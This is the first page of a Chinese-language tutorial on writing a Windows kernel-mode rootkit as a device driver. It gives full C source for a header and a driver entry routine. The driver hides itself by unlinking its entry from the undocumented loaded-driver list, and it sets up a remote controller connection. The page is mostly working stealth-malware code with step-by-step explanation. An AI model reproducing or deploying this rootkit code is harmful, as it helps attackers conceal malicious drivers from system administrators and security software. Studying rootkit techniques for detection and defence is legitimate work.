摘要:在安全界,rootkit已越來越引起人們的關(guān)注,而rootkit技術(shù)的過人之處就在于它的隱形技術(shù),本文旨在向讀者打開一扇通向rootkit隱形技術(shù)的大門。
一、綜述
本文將引領(lǐng)讀者打造一個初級的內(nèi)核級Rootkit,然后為其引入兩種簡單的隱形技術(shù):進程隱形技術(shù)和文件隱形技術(shù)。同時,為了讓讀者獲得rootkit編程的相關(guān)經(jīng)驗,我們順便介紹了rootkit的裝載、卸載方法,以及必不可少的測試技術(shù)。
本文介紹的Rootkit的主要構(gòu)件是一個設(shè)備驅(qū)動程序,所以我們首先了解一下我們的第一個rootkit。
二、rootkit主體
本節(jié)引入一個簡單的rootkit實例,它實際上只給出了rootkit的主體框架,換句話說,就是一個設(shè)備驅(qū)動程序。那么為什么要用設(shè)備驅(qū)動程序作為主體呢?很明顯,因為在系統(tǒng)中,設(shè)備驅(qū)動程序和操作系統(tǒng)一樣,都是程序中的特權(quán)階級——它們運行于Ring0,有權(quán)訪問系統(tǒng)中的所有代碼和數(shù)據(jù)。還有一點需要說明的是,因為本例主要目的在于介紹rootkit是如何隱形的,所以并沒有實現(xiàn)后門之類的具體功能,。
我們將以源代碼的形式說明rootkit,對著重介紹一些重要的數(shù)據(jù)結(jié)構(gòu)和函數(shù)。下面,先給出我們用到的第一個文件,它是一個頭文件,名為Invisible.h,具體如下所示:
//Invisible.h:我們rootkit的頭文件
#ifndef _INVISIBLE_H_
#define _INVISIBLE_H_
typedef BOOLEAN BOOL;
typedef unsigned long DWORD;
typedef DWORD* PDWORD;
typedef unsigned long ULONG;
typedef unsigned short WORD;
typedef unsigned char BYTE;
typedef struct _DRIVER_DATA
{
LIST_ENTRY listEntry;
DWORD unknown1;
DWORD unknown2;
DWORD unknown3;
DWORD unknown4;
DWORD unknown5;
DWORD unknown6;
DWORD unknown7;
UNICODE_STRING path;
UNICODE_STRING name;
} DRIVER_DATA;
#endif
|
我們知道,應(yīng)用軟件只要簡單引用幾個文件如stdio.h和windows.h,就能囊括大量的定義。但這種做法到了驅(qū)動程序這里就行不通了,原因大致有二條,一是驅(qū)動程序體積一般較為緊湊,二是驅(qū)動程序用途較為專一,用到的數(shù)據(jù)類型較少。因此,我們這里給出了一個頭文件Invisible.h,其中定義了一些供我們的rootkit之用的數(shù)據(jù)類型。
這里定義的類型中,有一個數(shù)據(jù)類型要提一下:雙字類型,它實際上是一個無符號長整型。此外,DRIVER_DATA是Windows 操作系統(tǒng)未公開的一個數(shù)據(jù)結(jié)構(gòu),其中含有分別指向設(shè)備驅(qū)動程序目錄中上一個和下一個設(shè)備驅(qū)動程序的指針。而我們這里開發(fā)的rootkit恰好就是作為設(shè)備驅(qū)動程序來實現(xiàn),所以,只要從設(shè)備驅(qū)動程序目錄中將我們的rootkit(即驅(qū)動程序)所對應(yīng)的目錄項去掉,系統(tǒng)管理程序就看不到它了,從而實現(xiàn)了隱形。
上面介紹了rootkit的頭文件,現(xiàn)在開始介紹rootkit的主體部分,它實際就是一個基本的設(shè)備驅(qū)動程序,具體代碼如下面的Invisible.c所示:
// Invisible
#include "ntddk.h"
#include "Invisible.h"
#include "fileManager.h"
#include "configManager.h"
// 全局變量
ULONG majorVersion;
ULONG minorVersion;
//當(dāng)進行free build時,將其注釋掉,以防被檢測到
VOID OnUnload( IN PDRIVER_OBJECT pDriverObject )
{
DbgPrint("comint16: OnUnload called.");
}
NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING
theRegistryPath )
{
DRIVER_DATA* driverData;
//取得操作系統(tǒng)的版本
PsGetVersion( &majorVersion, &minorVersion, NULL, NULL );
// Major = 4: Windows NT 4.0, Windows Me, Windows 98 或 Windows 95
// Major = 5: Windows Server 2003, Windows XP 或 Windows 2000
// Minor = 0: Windows 2000, Windows NT 4.0 或 Windows 95
// Minor = 1: Windows XP
// Minor = 2: Windows Server 2003
if ( majorVersion == 5 && minorVersion == 2 )
{
DbgPrint("comint16: Running on Windows 2003");
}
else if ( majorVersion == 5 && minorVersion == 1 )
{
DbgPrint("comint16: Running on Windows XP");
}
else if ( majorVersion == 5 && minorVersion == 0 )
{
DbgPrint("comint16: Running on Windows 2000");
}
else if ( majorVersion == 4 && minorVersion == 0 )
{
DbgPrint("comint16: Running on Windows NT 4.0");
}
else
{
DbgPrint("comint16: Running on unknown system");
}
// 隱藏該驅(qū)動程序
driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));
if( driverData != NULL )
{
// 將本驅(qū)動程序的相應(yīng)目錄項從項驅(qū)動程序目錄中拆下來
*((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;
driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;
}
// 允許卸載本驅(qū)動程序
pDriverObject->DriverUnload = OnUnload;
// 為本Rootkit的控制器配置連接
if( !NT_SUCCESS( Configure() ) )
{
DbgPrint("comint16: Could not configure remote connection.\n");
return STATUS_UNSUCCESSFUL;
}
return STATUS_SUCCESS;
}
|
| 共6頁: 1 [2] [3] [4] [5] [6] 下一頁 | ||||||||
|
